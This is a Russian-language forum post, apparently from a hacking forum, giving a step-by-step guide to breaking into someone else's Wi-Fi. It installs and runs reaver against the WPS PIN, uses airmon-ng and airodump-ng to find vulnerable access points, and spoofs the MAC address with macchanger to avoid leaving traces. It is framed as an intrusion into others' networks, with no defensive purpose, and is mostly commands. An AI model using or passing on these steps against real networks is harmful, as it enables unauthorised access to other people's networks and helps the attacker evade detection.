Взлом Wi-Fi.

WarTech Support
Оффлайн

WarTech Support

Заблокирован
Регистрация
13.04.18
Сообщения
33
Реакции
13
Репутация
95
Обратите внимание, если вы хотите провести сделку с данным пользователем, на то, что он заблокирован! Обязательно используйте услуги гаранта и не переводите денежные средства данному пользователю первым.
Всем привет. Сегодня раскроем пару карт, а именно, как можно взломать чужой вайфай. Для чего будете использовать это знание, решать только Вам. Нам понадобятся лишь пару инстурментов: сетевой адаптер(blueway N9000). Соотношение цены и качеств самое хорошее. Reaver-wps-fork v. 1.6.4 - его устанавливаем следующим образом:

Код:
    git clone t6x/reaver-wps-fork-t6x
    cd reaver-wps-fork-t6x
    cd src
    ./configure
    make
    sudo make install


Airodump-ng. И достаточно много терпения)
После покупки адаптера и установки всех вышеперечисленных утил начинаем хулиганить.
В терминале переходим в режим root

Код:
    sudo -s

Смотрим все сетевые карты, которые подключены к компу.

Код:
    ifconfig

Адаптер имеет название wlan0 или wlan1, в зависимости от подключенных до этого сетевых карт.
Переводим наш адаптер в режим монитора:

Код:
 airmon-ng start wlan1

Он станет wlan1mon
Поглядим, что у нас там?

Код:
    airodump-ng -a -W -M -U wlan1mon

screenshot-png.8138



В терминале сразу забегает очень много букв и цифр, аж в глазах может зарябить. 14 колонок. Но все нам не понадобятся.
По порядку о важных нам колонках:
Bssid - мак адрес роутера.
PWR - обратная величина, чем ближе онаfile:///home/groot/Downloads/Screenshot.png
к нулю тем сильнее сигнал роутера.
Beacons - так называемые маяки, в которых роутер передает всю инфу о себе.
CH - канал, по которому вещает роутер. Если Вы хотите сканировать отдельный канал, добавьте к

Код:
 airodump-ng -a -W -M -U wlan1mon -с + номер канала

ENC - шифрование. WPA и WPA2 самые распостраненные.
UPTIME - чем он больше, тем лучше.
WPS - по этой колонке смотрим, сможем ли мы пробить защиту. Если там Locked или нет совсем ничего - не наш вариант. Все остальное пробуем.
Выбрали точку, посмотрели все ли нормально. А мак свой поменял? Или наследить решил?
Код:

ifconfig wlan1mon down
macchanger -r wlan1mon - смена мака на рандом
ifconfig wlan1mon up

Поехали.
Во втором терминали под root запускаем нашу пушку:

Код:
    reaver -i wlan1mon -b XX:XX:XX:XX:XX:XX -vv -N

, где XX:XX:XX:XX:XX:XX - мак адрес точки. Все атака началась, дело это небыстрое, так что можно пока заняться своими делами.

Некоторые точки замечают атаку и ставят WPS в режим Locked. Поэтому посматривайте иногда. Если все пройдет хорошо, к утру :D, Вы сможете наблюдать чудо!




Спасибо за внимание!
 
Последнее редактирование модератором:
  • Like
Реакции: Apalon
Сверху Снизу